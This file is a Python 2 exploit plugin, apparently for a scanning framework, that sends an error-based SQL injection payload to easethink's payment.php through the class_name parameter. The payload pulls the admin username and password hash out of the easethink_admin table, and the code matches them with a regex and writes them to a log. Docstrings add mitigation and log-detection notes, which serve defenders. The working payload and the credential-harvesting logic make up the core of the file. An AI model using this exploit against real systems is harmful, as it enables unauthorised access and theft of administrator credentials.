class mstplugin:
    """Plugin that probes easethink's payment.php for an error-based SQL injection.

    exploit() sends one GET request that puts a SQL fragment in the
    ``class_name`` query parameter of ``payment.php?act=return`` and then
    searches the response body for leaked data.

    The server-side code is not part of this file. The payload implies that
    ``class_name`` reaches a SQL statement without escaping or binding and
    that database error text is echoed back to the client.

    Defensive notes:
      * Mitigation: bind ``class_name`` as a query parameter, or check it
        against a fixed list of known payment class names before use, and
        do not return database error messages in HTTP responses.
      * Detection: web access logs showing requests to payment.php whose
        ``class_name`` value contains a single quote, ``updatexml(``,
        ``concat(`` or the table name ``easethink_admin``.

    ``fuck``, ``color``, ``URL``, ``PORT``, ``PATH``, ``GREEN`` and ``RED``
    are not defined in this file; presumably the hosting framework injects
    them before calling exploit() -- TODO confirm.
    """
    # Plugin metadata as [key, value] pairs.
    # NOTE(review): TIME looks like a YYYYMMDD date -- confirm with the framework.
    infos = [
        ['NAME','easethink_SQLInject(payment.php)'],
        ['AUTHOR','mst'],
        ['TIME','20131024'],
        ['WEB','http://mstoor.duapp.com']
        ]
    # Option rows; each appears to be [name, default value, description].
    # The names match the URL/PORT/PATH globals read in exploit().
    opts  = [
        ['URL','localhost','REMOTE URL'],
        ['PORT','80','REMOTE URL-PORT'],
        ['PATH','/','REMOTE APP-PATH']
        ]
    def exploit(self):
        """Send the probe request and report whether the response leaked data.

        Prints a coloured status line through ``color.cprint`` in every case.
        On a match it also writes a log entry through ``fuck.writelog``.
        Returns nothing.
        """
        # Base URL of the target application, assembled by a framework helper.
        url = fuck.urlformate(URL,PORT,PATH)
        # The class_name value closes the string literal with a quote and adds
        # an updatexml() call. Its second argument is built from adm_name and
        # adm_password of the first easethink_admin row (0x7c is '|', 0x3a is
        # ':'), so a database error message would carry those values.
        poc = "payment.php?act=return&class_name=-1' and (updatexml(1,concat(0x7c,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))--"
        exp = url+poc
        try:
            # Fetch the page; the helper's timeout and redirect handling are not visible here.
            tmp = fuck.urlget(exp).read()
            # Look for ':' + word characters + '|' + word characters in the body.
            # The return type of fuck.find is not shown; the code only relies on len().
            res = fuck.find(r'\:\w+[|]{1}\w+',tmp)
            if len(res)>0:
                color.cprint("[*] Exploit Successful !\n[*] %s"%res,GREEN)
                # The log entry stores the matched text next to the target URL,
                # so the log file holds whatever credential data was matched.
                fuck.writelog("easethink_payment_sqli",URL+"::"+res)
            else:
                color.cprint("[!] Exploit False !",RED)
        # Python 2-only except syntax; this file does not parse under Python 3.
        # Any exception (network error, missing helper, ...) is reported as a failure.
        except Exception,e:
            color.cprint("[!] Exploit False !CODE:%s"%e,RED)
        
